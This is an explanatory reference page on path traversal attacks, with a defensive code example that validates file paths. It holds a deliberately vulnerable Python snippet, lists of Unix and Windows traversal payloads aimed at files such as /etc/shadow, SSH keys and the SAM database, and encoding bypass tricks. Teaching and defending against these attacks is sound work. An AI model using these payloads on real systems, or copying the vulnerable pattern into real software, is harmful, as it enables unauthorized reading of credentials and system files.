Path Traversal

Path Traversal (also called Directory Traversal or a Dot-Dot-Slash attack) is a vulnerability that lets attackers access files and directories outside the intended directory by manipulating file path references with sequences such as "../".

How It Works

Applications often use user input to construct file paths. If input is not properly validated, attackers can use relative path sequences to escape the intended directory and access arbitrary files on the filesystem.

Vulnerable Code Example

# Python - vulnerable
filename = request.args.get('file')
content = open('/var/www/files/' + filename).read()

# Request: /download?file=../../../etc/passwd
# Results in reading: /var/www/files/../../../etc/passwd = /etc/passwd

Common Payloads

# Unix/Linux
../../../etc/passwd
....//....//....//etc/passwd
..%2F..%2F..%2Fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd

# Windows
..\..\..\windows\system32\config\sam
..%5c..%5c..%5cwindows\win.ini
....\\....\\....\\windows\system32\drivers\etc\hosts

Common Targets

  • Unix: /etc/passwd, /etc/shadow, ~/.ssh/id_rsa
  • Windows: C:\Windows\win.ini, boot.ini, SAM database
  • Application: Config files, source code, credentials

Bypass Techniques

  • URL encoding: %2e%2e%2f
  • Double encoding: %252e%252e%252f
  • Unicode encoding: ..%c0%af
  • Null byte (older systems): ../../../etc/passwd%00.png
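
The following is an added example, not code from the original page: it contrasts a strip-the-dots filter with a canonicalize-then-check-containment approach, using the /var/www/files base directory from the vulnerable snippet and payloads listed above. The function names and the benign file name report.pdf are assumptions made for illustration.

```python
import os
from urllib.parse import unquote

BASE_DIR = "/var/www/files"  # base directory from the page's vulnerable snippet

def naive_filter(user_path):
    """Weak defence shown for contrast: strip '../' once, then concatenate."""
    stripped = user_path.replace("../", "")
    return os.path.normpath(os.path.join(BASE_DIR, stripped))

def safe_resolve(user_path, base_dir=BASE_DIR):
    """Return the canonical target path, or raise ValueError if it leaves base_dir."""
    if "\x00" in user_path:
        raise ValueError("null byte in path")
    base = os.path.realpath(base_dir)
    # realpath collapses '..' and follows symlinks; an absolute user_path
    # replaces base in join(), and the containment check below rejects it.
    target = os.path.realpath(os.path.join(base, user_path))
    # commonpath compares whole components, so /var/www/files_backup
    # is not mistaken for a child of /var/www/files.
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes base directory")
    return target

def is_allowed(raw_query_value):
    """Decode once, as a web framework would, then validate the decoded value.
    No further decoding may happen between this check and open()."""
    try:
        safe_resolve(unquote(raw_query_value))
        return True
    except ValueError:
        return False

# Constructed sample inputs: one benign name plus payloads listed on this page.
SAMPLES = [
    "report.pdf",
    "../../../etc/passwd",
    "..%2F..%2F..%2Fetc/passwd",
    "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd",
    "../../../etc/passwd%00.png",
    "/etc/passwd",
]

if __name__ == "__main__":
    print("naive filter on ....// payload ->",
          naive_filter("....//....//....//etc/passwd"))
    for s in SAMPLES:
        print(f"{s!r:45} allowed={is_allowed(s)}")
```

In a handler where the framework has already decoded the query string, call safe_resolve directly on the decoded value and open only the path it returns.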
